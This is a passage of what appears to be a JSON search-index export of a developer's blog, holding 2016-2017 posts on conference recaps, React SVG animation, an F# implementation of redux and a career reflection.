really a sign of the times with them engaging with the community.\nThe work in F12 really blew me away. I always figured they’d be doing something around it in the upcoming releases, I’d noticed a few things popping up recently, but never did I expect anything as big as what they are going with.\nI didn’t expect to be as blown away by CSS Grid as I was, I’m ready to have a crack at it myself and see what I can do with it.\nBut most of all I love this new Microsoft, whether it’s the .NET team publishing everything as Open Source projects, the OS team moving to a 6 monthly release cycle or the Edge team using twitter as a primary input source to their planning.\nDo yourself a favour, check out some of the talks (full agenda here), and join in the ride to make a better web for all of us.\n", "id": "2017-09-15-msedge-summit-2017" }, { "title": "httpstat.us now supports HTTPS", "url": "https://www.aaron-powell.com/posts/2017-09-01-httpstatus-now-https/", "date": "Fri, 01 Sep 2017 10:10:53 +1000", "tags": [ "httpstat.us" ], "description": "", "content": "A few years ago Tatham Oddie and I launched a little website for testing HTTP responses called httpstat.us.\nWith websites being encouraged to move to HTTPS-first (like how Google is pushing for it) and the cost-point of HTTPS no longer an issue thanks to Lets Encrypt I finally got around to enabling HTTPS on there.\nNow you can test status codes from secured sites without mixed-mode warnings.\n", "id": "2017-09-01-httpstatus-now-https" }, { "title": "WhatKey", "url": "https://www.aaron-powell.com/posts/2017-08-30-whatkey/", "date": "Wed, 30 Aug 2017 16:03:46 +1000", "tags": [ "whatkey", "javascript", "web", "project" ], "description": "The relaunch of my whatkey service", "content": "Nearly 7 years ago (seriously, that long?!) I launched a website to help find what keyCode you hit in JavaScript.\nWell the domain lapsed, the app went offline on the host, and ultimately I didn’t care to much to fix all of that. Well never fear, I’ve brought it back from the dead!\nYou’ll now find WhatKey living at on my website. I’ve also done a little tweak to it so that you can see all keyCode values at the same time.\nSo go forth and inspect those keyboard events!\n", "id": "2017-08-30-whatkey" }, { "title": "NDC Sydney Recap", "url": "https://www.aaron-powell.com/posts/2017-08-30-ndc-sydney-recap/", "date": "Wed, 30 Aug 2017 11:46:02 +1000", "tags": [ "ndc", "ndc-sydney", "conference" ], "description": "", "content": "In August this year I was lucky enough to speak at NDC Sydney for the 2nd time, this year I use the material from my redux series for one talk and did a second talk about getting started with Docker (which I’ll write about separately).\nBut this isn’t a post about my talks, instead I walk to talk about some of the things that I learnt at NDC. I tried to get to a variety of talks, some directly relate to what I do day-to-day, some less so.\nWeb vNextLogically I went to a few web talks, they are obviously very related to my area of expertise and passion, so I jumped into the two sessions from Patrick Kettner, one on Service Workers and one on progressive web applications (or more accurately, doing progressive enhancements in web applications).\nService Workers Service Workers interest me as a technology, I’ve always been looking at ways that we can do offline-first applications (see my Flight Mode series, which is a bit dated now), but I’ve never had time to get into the basics of it. Well that’s just what a conference is for ey! It was a good intro, covered off the basics of the API and features that it can give you while looking at some initial scenarios that you might want Service Workers in.\nSome key tips to take away from Service Workers are:\nMake sure you feature detect first (if ('serviceWorker' in navigator) { ... }) Use ES2015+ code, all browsers that support Service Workers support that! The Service Worker Cookbook is a great getting started resource Now I need to find some time to play around with the ideas that I’ve got for using them. Maybe I’ll put together some blog posts of my own, extending the Flight Mode series.\nProgressive web applications This wasn’t a talk to be confused with PWA’s and while it did talk about PWA’s a bit, it was more about generate ‘how to make a web application with progressive enhancements’. There wasn’t anything particularly revolutionary in this talk, but there was some fun takeaways like how Pokedex.org uses a WebWorker to do virtual DOM diffs rather than the UI thread, essentially pushing the expensive processing portion of an application to a ‘background’ thread. I can see this technique being useful when working with large datasets in the browser.\nBreaking my brain with .NETThere were a few speakers at NDC that I’d always wanted to see speak, or have seen speak and always have something enjoyable to learn about.\nPushing C# to the limit If you get a chance to see Joe Albahari, aka, Mr LINQPad speak, go check it out. This session he walk talking about something that I don’t think I’ll ever need to do, but it’s nice to know how to do it, but, he was basically covering things like pointers, unsafe memory and writing your own cross-process communication framework. I walked out of there with a lot more of an appreciation of what it takes to do an application that has performance critical operations and how complex it is to do memory management.\nServerless and FSharp An F# talk from Mathias Bradewinder, well of course you have to attend that. A talk on Azure Functions in F#? That is a great combination (and it’s a frustration I’ve come up against a number of times), so I headed off to that one to learn about how best to go about it.\nThe outcomes I have is that C# and Node.js are still the ones getting the most love from the Azure Functions team (sad, but not surprising), but you can get F# working nicely in a scripting manner through some #if directives to open the right namespaces. Ultimately though you’re better off going down the path of compiled functions if you want F#, as then it’s a lot more obvious what dependencies you have included, rather than relying on the magic of the hosting environment.\nMathias said he’ll publish some info around what he presented, since I didn’t scribble my notes fast enough 😜.\nPlanning for failure Jimmy Bogard’s talk to me was less about the technical side of what he was talking about and more about framing solutions for a business.\nThe crux of the talk was that you have a system that does a few things as a single unit of work:\nSave an order to your DB Process a payment via Stripe (or any payment provider) Send an email Update the order as paid Drop a message into a message queue Now treating this as a single unit of work introduces a problem, how do you handle failure in any of those? “distributed transactions” I hear you say? Yeah… we’ve all tried that in the past haven’t we 😕.\nJimmy went through each of the steps in the process, broke them down into the true goal of the step, and then how we can handle failure to the business. For some of the things, a complete failure is acceptable, others might have a retry option and others are something that we can handle in more of a background job.\nReally, the core takeaway from this talk shouldn’t have been how to use technology to solve failure points, but instead understand just where those failure points are and how do you present to the business your options to handle them?\nCan they accept a complete failure? Can it be pushed across to a manual process in the event of failure? Can you perform a retry? Does the action have to be done immediately? Knowing your options, the pros and cons, and then being able to articulate them to the business is key.\nNot all techWhile NDC is a tech conference not every talk there was about tech, there were talks about career growth, leadership and workplace happiness.\nSo on the last day of the conference I went to Kylie Hunt’s talk on workplace happiness (and not just because of the promise of TimTams). Being a leader within Readify means that I do whatever I can to ensure a happy and healthy working environment for my colleagues. Kylie shared her experience as a workplace happiness coach on how to handle different types of bad bosses, that we need to stop celebrating overwork, that constant 10 hour days are dangerous, how unconscious (or conscious) bias, resulting in unfairness (perceived or real) can impact peoples productivity and an important topic at Readify, how to embrace change (either being change within our clients or change within Readify). Do yourself a favour and watch the video from NDC Oslo.\nWrap upI really enjoy NDC Sydney, it’s such a different scale event to most conferences around, and there’s such a variety of talks to get to. All the talks were recorded so we can expect the videos to appear online over the coming months, and I’ve got a bunch of sessions that I’m going to go back and watch!\n", "id": "2017-08-30-ndc-sydney-recap" }, { "title": "React SVG Chart Animation", "url": "https://www.aaron-powell.com/posts/2017-08-10-react-svg-chart-animation/", "date": "Thu, 10 Aug 2017 20:39:43 +1000", "tags": [ "react", "svg" ], "description": "", "content": "In my last post I talked about animating SVG objects and how to combine that with React. As I talked about the catalyst for it was looking into how we could do charts.\nWell of course after my initial experiments I wanted to actually look at how to do a chart.\nCreating a basic chart For this I started with the great walk through on SVG Charts at CSS Tricks, and I’m going to use the Line Chart example for this (but with randomly generated data).\nNow we know what the basic React component would look like:\n1 2 3 4 5 6 7 8 const Line = ({ data }) => ( <polyline fill="none" stroke="#0074d9" strokeWidth="2" points={data} /> ); But that’s not what we’ve come here to look at, rendering elements to the DOM is pretty basic, let’s start thinking about animation.\nAnimating a line chart The kind of animation I want to go with the for this is having the lines grow from a 0 x-axis to their final resting point on the y-axis.\nAlso, rather than just having an array for our input data, I’m going to try and represent something a bit more realistic by having an object. My data will look like this:\n1 const data = [{ x: 0, y: 120 }, { x: 20, y: 60 }]; Like my last post I’m going to use a Higher Order Component for wrapping up the logic around handling the animation. Let’s start with the constructor and render:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 const animateLine = (WrappedComponent) => { class Wrapper extends React.Component { constructor(props) { super(props); const { xSelector, ySelector, data } = props; let mappedData = data.map((d) => [xSelector(d), ySelector(d)]).reduce((arr, curr) => arr.concat(curr), []); let max = data.map((d) => ySelector(d)).sort((a, b) => a - b).reverse()[0]; let liveData = mappedData.map((x, i) => i % 2 ? max : x); this.mappedData = mappedData; this.max = max; this.state = { data: liveData, count: 0 }; } render() { return <WrappedComponent data={this.state.data} />; } }; Wrapper.displayName = `AnimationWrapper(${WrappedComponent.displayName | WrappedComponent.name | 'Component'})`; return Wrapper; }; Now, we’re expecting 3 props on the component:\nAn array of data A function for getting the x value from a data item A function for getting the y value from a data item We then create a new array that is flattening the data, so it’d look like:\n1 [0, 120, 20, 60] So now we need to prepare for our animation, to achieve this we need to flatten the line we first draw and then we’ll walk back up to it. To do this we need to find the largest y value, this I’m putting into a variable called max.\nFinally I need to create that flattened data set, doing is done by taking the array of points and turn all the y points to the max value (because it’s the bottom of the graph we start at, which is the approximately height of the SVG). Now the data that we’re rendering to the UI looks like this:\n1 [0, 0, 20, 0] Great, we’ve got a hidden line graph that doesn’t actually represent our data… not really useful.\nTime to start building the animation. Like the last post we use componentDidMount to start the animation and the componentWillUnmount to stop it if needed. Here’s the componentDidMount:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 componentWillMount() { const animator = () => { if (this.state.count >= this.max) { cancelAnimationFrame(this.rafId); return; } const newData = this.state.data.map((data, index) => { if (index % 2) { if (data > this.mappedData[index]) { return data - 1; } } return data; }); this.setState({ data: newData, count: this.state.count + 1 }); this.rafId = requestAnimationFrame(animator); } this.rafId = requestAnimationFrame(animator); } Let’s break it down, or more accurately, break down the animator function, which is really what does the animation for us.\nFirst step, the reason we have the max on the component is so that we know when to stop trying to animate a point. That’s what this logic is for:\n1 2 3 4 if (this.state.count >= this.max) { cancelAnimationFrame(this.rafId); return; } Second step, start taking our temporary data a bit closer to the real data:\n1 2 3 4 5 6 7 8 const newData = this.state.data.map((data, index) => { if (index % 2) { if (data > this.mappedData[index]) { return data - 1; } } return data; }); We’re going to map over the data and:\nIf the current index is even, an x-axis value, just return it, we’re not moving that If the current index is odd Is it less than the target value, add 1 to it Otherwise just return the current value Third step is to put that new array into state (and cause a re-render) as well as increase the loop count, then kick off requestAnimationFrame again.\nAnd that’s all, we have a lovely animated line cart.\nConclusion Again we’ve seen that a small bit of code and React components can make a very easy to read animated SVG without any external dependencies.\nI’ve created another example that you can see here in action, and the data is randomly generated so reloading the page will get you a new chart each time 😄.\n", "id": "2017-08-10-react-svg-chart-animation" }, { "title": "React SVG Animations", "url": "https://www.aaron-powell.com/posts/2017-08-08-react-svg-animations/", "date": "Tue, 08 Aug 2017 20:58:32 +1000", "tags": [ "react", "svg" ], "description": "", "content": "I’ve been working on a project recently that we’ve using React for the UI component of it. While starting planning out the next phase of the project we looked at a requirement around doing charting. Now it’s been a while since I’ve done charting in JavaScript, let alone charting with React, so I did what everyone does these days and shouted out on the twittersphere to get input.\nJoke replies aside there was the suggestion that, if I’m using React, to just do raw SVG and add a touch of d3 to animate if required.\nWell that’s an approach I’d never thought of, but pondering it a bit, it made a lot of sense. If you look at charting libraries what are they doing? Providing you helper methods to build SVG elements and adding them to the DOM. And what does React do? Creates a virtual DOM which is then rendered to the browser in the real DOM. So using an external library what you find is that you’re creating elements that lives outside the virtual DOM and as a result can cause issues for React.\nThat was all a few weeks ago and while the idea seemed sound I didn’t need to investigate it much further, at least not until earlier this week when charting + React came up again in conversation. So I decided to have a bit of a play around with it and see how it’d work.\nBasic React + SVG Honestly drawing SVG’s in React isn’t really that different to doing any other kind of DOM elements, it’s as simple as this:\n1 2 3 4 5 6 7 const Svg = () => ( <svg height="100" width="100"> <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" /> </svg> ); ReactDOM.render(<Svg />, document.getElementById('main')); Ta-da!\nReact + SVG + animations Ok, so that wasn’t a particularly hard ey? Well how if we want to add animations? I grabbed an example off MSDN (example #2) to use as my demo.\nI created a demo that can be found here. Comparing that to the original example code it’s a lot cleaner as we no longer need to dive into the DOM ourselves, by using setState it’s quite easy to set the transform attribute.\nNow we’re using requestAnimationFrame to do the animation (which in turn calls setState) which we can use the componentDidMount to start and componentWillUnmount to stop it.\nAdding HOC So we’ve got a downside, we’re combining our state in with our application code, so what if we wanted to go down the path of using a Higher Order Component to wrap up the particular transformation that we’re applying to SVG elements.\nLet’s create a HOC like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 const rotate = (Component, { angularLimit, thetaDelta }) => { class Rotation extends React.Component { constructor(props) { super(props); this.state = { currentTheta: 0 }; } componentDidMount() { const animate = () => { const nextTheta = this.state.currentTheta > angularLimit ? 0 : this.state.currentTheta + thetaDelta; this.setState({ currentTheta: nextTheta }); this.rafId = requestAnimationFrame(animate); }; this.rafId = requestAnimationFrame(animate); } componentWillUnmount() { cancelAnimationFrame(this.rafId); } render() { return ( <g transform={`rotate(${this.state.currentTheta})`}> <Component {...this.props} /> </g> ); } } Rotation.displayName = `RotatingComponent(${getDisplayName(Component)})`; return Rotation; }; Basically we’ve moved the logic for playing with requestAnimationFrame up into it, making it really easy to rotate a lot of different SVG elements. Also instead of applying the transform to the rect element itself we apply it to a wrapping <g> element.\nI’ve created a second example to show how this works too.\nConclusion Ultimately I thought this was going to be a lot harder than it turned out to be! If you spend a bit of time aiming to understand how SVG works directly rather than relying on abstraction layers we can quickly make a React application that uses inline SVG + animation.\nNow back on the original topic of charting? Well that really just comes down to using array methods to go over a dataset, create the appropriate SVG elements and apply attributes to them, so I don’t see it being much more than taking this simple example and expanding on it.\n", "id": "2017-08-08-react-svg-animations" }, { "title": "DDD Sydney 2017 Recap", "url": "https://www.aaron-powell.com/posts/2017-08-07-dddsydney-2017-recap/", "date": "Mon, 07 Aug 2017 19:19:17 +1000", "tags": [ "dddsydney" ], "description": "", "content": "Another year has come and gone and with that DDD Sydney!\nLast year I wrote about what I learnt organising DDD Sydney for the first time and I wanted to talk a bit about what happened this year and see how many of the points I raised last year we were able to address.\nTiming Well this time we decided to give us more than 2 months to organise the event. The DDD Sydney crew started talking around the start of this year about how we’d go about it, nothing concrete, but an initial “who wants to be involved” and “what needs to be done”. Since we didn’t talk about a date (and didn’t for a few months) we had no time preasure which in and of itself was a problem, no one was super motivated to make it happen.\nAfter a few months of relative inaction we started doing a few things, we started by setting up a few of the essential services we meant to do last year, an O365 subscription + Azure, so we can stop running things off our personal accounts (and to look more professional when emailing than just a gmail account).\nAdmittedly we still had a bunch of stuff we didn’t do early enough, we didn’t lock a venue in until April, so more like 3 months lead time this year 😛.\nSponsorship and Finance As I mentioned last year money is one of the hardest things about organising an event, thankfully we had some leftover cash from last year which meant that we could address a few early expenses before sponsors dropped.\nFor the sponsors this year Steve Godbold put together a strong sponsor pack and we were able to lock in a good number of sponsors. We also got this out well in advance meaning that we have sponsors paying their invoice before the event, helping the cash flow situation. Our one downside this time was having the event just after the start of a new financial year, so a few of the potential sponsors we talked to simply didn’t have budget left. Next year we’ll look to engage sponsors much earlier on, even if the event is to be later in the year.\nPeople We had a new growth of our 10% this year, which I’m happy with, it shows that we’ve started reaching out to more communities and our brand recognition is growing. To help with this we did a lot more pushing to User Groups around Sydney, especially the Women in Tech orientated groups, this reflected in an increased female contingent and we’ve already received some feedback on ideas to make it even more accessible to people for next year.\nWhile attendee growth is important we also saw a growth in speakers, we had around 50 submissions this year (for 15 slots!), over 200 votes cast and 4 first time speakers which is the one statistic that I’m most excited by, DDD Melbourne was where I got my start too 😄.\nListening to Feedback While there was a bunch of stuff to address just based on what we learnt doing it the first time we did listen to the feedback that our attendees provides us with. One of the main pieces of feedback from the 2016 event was around the food, we only just had enough food last year. This year I decided to listen to my wifes advice and let her take the lead on that, after all she has worked in marketing/sales in the food industry for the last 7-odd years. The main thing she pushed for from our supplier was pre-packed lunchboxes for lunch rather than the traditional sandwich platter/hot trays/etc. and this worked a treat. By having everything pre-packaged lunch was a ‘pick a box and go’ for attendees and it removed the feeling of inequality (“hey, they took a bigger plate than me!”). Having read this years feedback it seems the food was a highlight (well, behind content and people obviously :winking:), the only negative food feedback was that we had too much!\nWe’ve got some other feedback we’ll be looking to incorporate for next years event, but I’m not sure who the smartass was that submitted this piece though 😛:\ngetting Aaron to shave off his beard as a charity event :-)\nThat… probably won’t happen (I haven’t been clean shaven for around 2.5 years now).\nSo onwards and upwards, we’re taking a well earned break before starting to plan for DDD Sydney 2018.\n", "id": "2017-08-07-dddsydney-2017-recap" }, { "title": "Chauffeur at Umbraco Sydney", "url": "https://www.aaron-powell.com/posts/2017-07-31-chauffeur/", "date": "Mon, 31 Jul 2017 19:34:08 +1000", "tags": [ "umbraco", "chauffeur" ], "description": "Learn about automating Umbraco with Chauffeur", "content": "Chauffeur is one of my pet projects and is something that I think is really quite useful when it comes to working with Umbraco in a CI/CD situation.\nEarlier this month I was given the opportunity to speak at the Sydney Umbraco UG and show off Chauffeur.\nI also recorded the presentation for anyone who’s interested in learning more about Chauffeur and seeing it in action. I cover off the role of Chauffeur, how to get started with it and finally its extensibility model. Check out the video on YouTube and if you’d like to know more about Chauffeur or understand how better to integrate it into your workflow I’m happy to have a chat.\n", "id": "2017-07-31-chauffeur" }, { "title": "Site Rebuild", "url": "https://www.aaron-powell.com/posts/2017-07-27-site-rebuild/", "date": "Thu, 27 Jul 2017 07:18:34 +1000", "tags": [ "website" ], "description": "", "content": "Well it’s finally happened, I’ve finally listened to the advice I’ve quite often received from readers that my website layout isn’t great, the code examples are hard to read and it generally wasn’t great.\nOn top of the feedback I often received about my site just working on it has been a pain, which is one of the main reasons why I haven’t been blogging much over the past 6 months (although I have a lot of backed up content). This was mainly due to the pain that DocPad caused when trying to install locally (my god, the dependencies!), the time it took to regenerate the site on each publish (seriously, 5+ minutes every time) and just the general cumbersome nature of it.\nSo while being away on a skiing holiday with the family and having some down time in the evening where I was sitting by the fire drinking a beer I decided it was time to rebuild it from scratch. This time I’ve used a proper static site generator called Hugo combined with a slightly overridden theme Osprey.\nThe result of this is a site that I can build a lot easier, I can publish simply to Azure AppServices and writing in it is simpler. The one downside is that I’ve probably broken a lot of my old deep linking/referrers. I’ve done my best to keep the URL structure the same, but I use to have a lot of custom redirects in place that are no longer there (maybe I’ll add them back in the future, we’ll see). I’ve still got a couple of tweaks to do but overall I’m much happier and should finally get back to my blogging.\n", "id": "2017-07-27-site-rebuild" }, { "title": "Learning redux with reducks - beyond JavaScript the movie", "url": "https://www.aaron-powell.com/posts/2016-10-12-learning-redux-with-reducks-beyond-javascript-talk/", "date": "Wed, 12 Oct 2016 00:00:00 +0000", "tags": [ "javascript", "redux", "reducks", "fsharp" ], "description": "A presentation I gave at the F# Sydney UG on implementing redux in F#", "content": "In September I was invited to present at the F# Sydney user group and I decided to present on what I blogged about in my last post, implementing redux in F#.\nYou can catch the video of the talk on YouTube.\n", "id": "2016-10-12-learning-redux-with-reducks-beyond-javascript-talk" }, { "title": "Learning redux with reducks - beyond JavaScript", "url": "https://www.aaron-powell.com/posts/2016-10-10-learning-redux-with-reducks-beyond-javascript/", "date": "Mon, 10 Oct 2016 00:00:00 +0000", "tags": [ "javascript", "redux", "reducks", "fsharp" ], "description": "Exploring how redux can be used as a generic design pattern, not just a JavaScript library", "content": "Over this series we’ve been looking at how we would write a library which mimics the functionality of Redux from scratch to understand how it works at the most basic of levels. What we’ve seen is that there’s three basic components, a Store which is our central point, Actions which indicate something happening and Reducers which handle something happening.\nReally this is just a simple pattern for data flow, so I wanted now to explore how we could go beyond JavaScript with Redux and create something else.\nLook ma, no JavaScript! To illustrate this I decided to implement Redux, well, something that does some of what Redux does, in F#. The reason I chose F# was because as we’ve seen Redux lends itself nicely to functional programming concepts, like that Reducers should be pure functions and that state is immutable, so doing it in a functional programming language seemed to fit nicely (and also it meant I could write more F# :P).\nIf you’re the kind of person who wants to skip ahead to the end you’ll find the code on my GitHub, but for the rest of us I’ll walk through some of the core concepts. Also I’ll point out that this isn’t the first implementation of Redux in .NET, nor is mine production ready!\nStarting from the topWhen implementing something like Redux in F#, or any strongly typed language, we’ll have a few things we need to be mindful of up front, one of those is that we actually have a type system, so I’m going to start by defining two types, one for our Store and one for our Middleware Store (which you’ll remember was introduced when we added middleware):\n1 2 3 4 5 6 7 8 type MiddlewareStore<'State, 'Payload> = { getState : unit -> 'State dispatch : 'Payload -> 'Payload } type Store<'State, 'Payload> = { getState : unit -> 'State dispatch : 'Payload -> 'Payload subscribe : (unit -> unit) -> unit -> unit } Now you’ll see here that we’ve got two generic arguments to these types, we have one which represents the state of the application and the other is payload, which is provided to the dispatch method. This deviates a bit from how the actions were dispatched in our JavaScript implementation, but we’ll come to that in a moment, first off we’re going to create the createStore function.\nCreating the Store When creating a store you can provide up to three arguments:\nThe root reducer The initial state Middleware In JavaScript the last two are optional, so how will we handle them in F#? Well in F# we don’t have method overloading so we can’t define multiple createStore functions (without using different names), so we could go with the Option type for them, or we could make them mandatory. I’ve gone with the final approach, making them mandatory, as this will simplify some of our internal code and avoids the pain that can be introduced with dynamic typing.\nSo what does createStore look like?\n1 2 let rec createStore<'State, 'Payload> = fun reducer (initialState : 'State) (middlewares : seq<MiddlewareStore<'State, 'Payload> -> ('Payload -> 'Payload) -> 'Payload -> 'Payload>) -> Oh yeah, dem type annotations! The type annotations for the middlewares argument really melted my brain…\nNow you’ll also notice that I’ve defined this as a recursive function (the rec keyword), and that’s because we’ll need it for handling middleware, but let’s start fleshing it out:\n1 2 3 4 5 let rec createStore<'State, 'Payload> = fun reducer (initialState : 'State) (middlewares : seq<MiddlewareStore<'State, 'Payload> -> ('Payload -> 'Payload) -> 'Payload -> 'Payload>) -> match Seq.isEmpty middlewares with | false -> | true -> Pattern matching FTW! We can use pattern matching to decide if we’re going to have middleware or not, and then that results in which branch to take. Let’s start making some middleware.\nImplementing a store with middleware Here’s what it looks like:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 let compose chain = let last = Seq.last chain let rest = Seq.toList(chain).[0..(Seq.length chain) - 2] fun arg -> List.foldBack (fun func composed -> func composed) rest (last arg) let rec createStore<'State, 'Payload> = fun reducer (initialState : 'State) (middlewares : seq<MiddlewareStore<'State, 'Payload> -> ('Payload -> 'Payload) -> 'Payload -> 'Payload>) -> match Seq.isEmpty middlewares with | false -> let store = createStore reducer initialState Seq.empty let mutable dispatch = store.dispatch let chain = middlewares |> Seq.map (fun m -> m ({ getState = store.getState dispatch = fun action -> dispatch (action) })) dispatch <- dispatch |> compose chain { store with dispatch = dispatch } Well that’s… interesting? if you remember how we implemented middleware some of the ideas will look familiar, but we’ll break it down a little bit. First off we’ve got the compose function which:\nGrabs the last item in the sequence Grabs the rest of the items Uses List.foldBack which is the same as Array.prototype.reduceRight to walk backwards through the sequence and create a new dispatch method Again this broke my brain as I tried to try and work out how it’d come together and while strong typing helps it’s still a bit frustrating. Ultimately the way that it works is:\nCreates a function that takes 2 arguments, func and composed func is the current item in the collection composed is the item that we’re returning List.foldBack then takes 2 arguments, the collection that we’re folding and the initial value (last arg).\nOk, maybe I should have named things a bit better… but at the end of the day compose has a signature of compose:seq<('a -> 'a)> -> ('a -> 'a) which is a function taking a sequence of functions that return their argument and returns a single function that takes an argument and returns it. Simple!\nNow we can use that inside our createStore method. The first line of the match when we have middleware is:\n1 let store = createStore reducer initialState Seq.empty This is why we made a recursive function, when we have middleware we create a store without middleware by invoking ourself, and that’s because we’re going to grab the dispatch method off the store, wrap it with middleware and return a new store with the new dispatch method.\nOur local variable for dispatch is defined as a mutable variable because we want to replace it with the new composed chain!\nActually making a store Alright, the hard stuff is out of the way, now we’ll, you know, create the store!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | true -> let mutable state = initialState let mutable subs = Seq.empty let dispatcher (action : 'Payload) = state <- reducer state action subs |> Seq.iter (fun s -> s()) action let subscriber subscriber = subs <- Seq.append subs [ subscriber ] let index = Seq.length subs fun () -> subs <- subs |> Seq.mapi (fun i s -> i, s) |> Seq.filter (fun (i, e) -> i <> index) |> Seq.map (fun (i, s) -> s) let getState = fun () -> state { getState = getState dispatch = dispatcher subscribe = subscriber } Here’s the definition of our three core functions, dispatch, subscribe and getState. None of these methods are particularly complex, the only thing we have to do that isn’t something I’m super keen on is the use of mutable for the state and subs. This is because we need to change a single point of the state, which is “owned” by the store, and we need to be able to add/remove subscribers.\nAt the end of the function we create a new store instance with out functions all nice and bound!\nUsing our Reducks store Right so we’re all ready to go with out implementation, seriously, 53 lines of F# is all it took! Now we want to see about how we would use it in an application.\nFor that I’ve created a simple demo app that is a chat application. It’s a SingalR server (running in a console application) that has a Reducks store on the server that has a single method dispatch. Here’s what the hub looks like:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 type Typing = { user: string value: string } type Payload = | User of string | PostMessage of string | Typing of Typing type public ChatHub() = inherit Hub() let store = getStore() override this.OnConnected() = store.subscribe(fun () -> this.Clients.Client(this.Context.ConnectionId)?subscribe(store.getState()) () ) |> ignore System.Threading.Tasks.Task.Run(fun () -> ()) member this.Dispatch (action: Payload) = match action with | Typing payload -> store.dispatch(typingAction payload.user payload.value) |> ignore | User payload -> store.dispatch(newUserAction payload) |> ignore | PostMessage payload -> store.dispatch(postMessageAction payload) |> ignore When the client connects the hub finds the store and subscribes to it. When store state changes it invokes the subscribe method on the connected client, sending the state, and the client decides what to do with the updated state.\nThe dispatch method receives an Action and this is where we first see the power that F# gives us in Redux, static typing and union types. WHen in JavaScript we would have to set the type property of the Action we can rely on the static type to give us this, and our Action, which looks like:\n1 2 3 4 type Payload = | User of string | PostMessage of string | Typing of Typing Is a single type that represents a bunch of different Actions, which then can be combined with pattern matching to dispatch a store-level action (sure we could pass the action directly from the client to the server store, but I wanted to do some data remapping, basically the server becauses an action creator).\nServer side implementation So what does the server side usage of reducks look like? Let’s start with our actions:\n1 2 3 4 5 6 7 8 9 10 11 12 13 type Payload = | NewUser of string | Message of (string * DateTimeOffset) | Typing of (string * string) let postMessageAction name = Message(name, DateTimeOffset.Now) let typingAction user value = Typing(user, value) let newUserAction user = NewUser(user) Pretty simple looking little action creators which takes some information and creates a new value from them using the union type.\nNext up let’s look at how we create the store instance:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 type Message = { user: string timestamp: DateTimeOffset message: string } type State = { typing: Map<string, string> messages: seq<Message> users: Set<string> } let reducer (state: State) (action: Payload) = match action with | Message (user, timestamp) -> let message = state.typing.[user] { state with messages = Seq.append state.messages [{ user = user; timestamp = timestamp; message = message }] typing = Map.remove user state.typing } | Typing (user, value) -> { state with typing = state.typing.Add(user, value) } | NewUser user -> { state with users = Set.add user state.users } let middleware store next action = match action with | NewUser user -> printfn "The user '%s' has joined" user | _ -> () next(action) let store = createStore reducer { typing = Map.empty<string, string>; messages = Seq.empty; users = Set.empty } [middleware] let getStore = fun () -> store More types, yay! I’ve a basic reducer which again leverages pattern matching to then update the appropriate part of the state. We’re able to create a new state using the existing state object but we provide a partial state, the stuff we’re changing, so that the new state is a combination of the current application and the result of the reducer. This is similar to either using Object.assign or the spread operator in JavaScript.\nFor demo purposes I’ve also created a piece of middleware which logs to the console window when the action is a NewUser, otherwise it’s a no-op.\nFinally we create the store providing the reducer, initial state (a record type) and the middleware sequence.\nSo fire up the console application and it’s running!\nConclusion There you have it, we’ve taken redux, a library written in JavaScript, pushed it server side and written it in something other that JavaScript.\nThe code is on my GitHub if you’re keen to have a poke and a play (or if you want to show me how to do the F# better!), but overall I’m pretty happy with how it came together and how clean it is to read.\nSome fun side effects of having the store living server side is that when a new client connects they are provided with all the existing state (assuming they dispatch a “new user” event), which can be a fun part for time travel debugging ;).\n", "id": "2016-10-10-learning-redux-with-reducks-beyond-javascript" }, { "title": "SD to PC - A journey of many steps", "url": "https://www.aaron-powell.com/posts/2016-08-29-sc-to-pc/", "date": "Mon, 29 Aug 2016 00:00:00 +0000", "tags": [ "readify", "career" ], "description": "A look back at my time at Readify, what I've learnt and how I've grown", "content": "Preamble I cut my teeth in the Melbourne .NET scene through the mid-2000’s and if you were doing that you knew who Readify were. They were the Microsoft developers.\nIf you had a problem they’d know how to fix it.\nIf you were at a Microsoft User Group, they were running it and presenting the content.\nIf you went to a Microsoft conference, they were giving the talks.\nMy goal was always to join them, but I didn’t know when or how, I was just an unknown dev writing some ASP.NET, I wasn’t this awe inspiring consultant.\nI joined Readify as a Senior Developer in September 2010 and in July of 2016 I achieved a goal I’d set out for myself, to become a Principal Consultant.\nIt’s been a long journey with many learnings along the way so I thought I’d share that for anyone else looking to embark on the same sort of career path.\nWhere it all began When I joined Readify in ‘09 I had one goal, to be the best developer in Readify. I’d just come out of a few years of working in digital agencies which are great environments to learn but it comes at a cost, a cost of quality, a cost of maintainability, a cost of good practice.\nSo I saw Readify as an opportunity to take all the things I thought I could do better in software, I wanted to take that opportunity and get even better.\nBut there was one thing that I was sure I didn’t want from my career, and that was management, which is exactly what I saw the SC and PC roles being (back then we had no LC role).\nWhen the conversation came up with the HR team of the time I was adamant that I wasn’t interested in SC (or beyond), but I didn’t want ‘Senior Developer’ to be the pinnacle of my career, I’d be a Senior Developer at 3 different companies now and for around 5 years. I was sure there had to be “more”. But there was a problem, I didn’t know what this “more” was, what it’d look like or how we’d sell the role, I was just sure it had to exist.\nA change in goals and going for SC As you’re probably aware I did make SC, but given the opinion I mention above you might be wondering why?\nWell after 2 years or so I started to think what my long term career goals were and whether Readify was the right place if there was nothing beyond the SD role for me there. This got me thinking about what was keeping me at Readify and I came to a realisation, writing software wasn’t what I was passionate about, solving problems is.\nAt the same time I was approached by another company trying to lure me in, I went for some interviews with them, talked through what I was wanting and ultimately I was describing a team lead role to them; somewhat a management role. So I decided to strike up the conversation within Readify as well and that I could see SC in my future. I ended up being offered the team lead role for one of the products at this other company but I (obviously) turned it down in the end, it was one of the hardest I’ve made but I think it was the right one (and still think that, even if it’s with a twinge of regret :P).\nSo it was full steam ahead for SC, I received feedback on where my gaps were, and one of the pieces of feedback I received I still remember, Be less Aaron.\nBe less Aaron? On the surface this is pretty weird a piece of feedback and having talked to a number of people about it they also agree it’s weird and some people have said 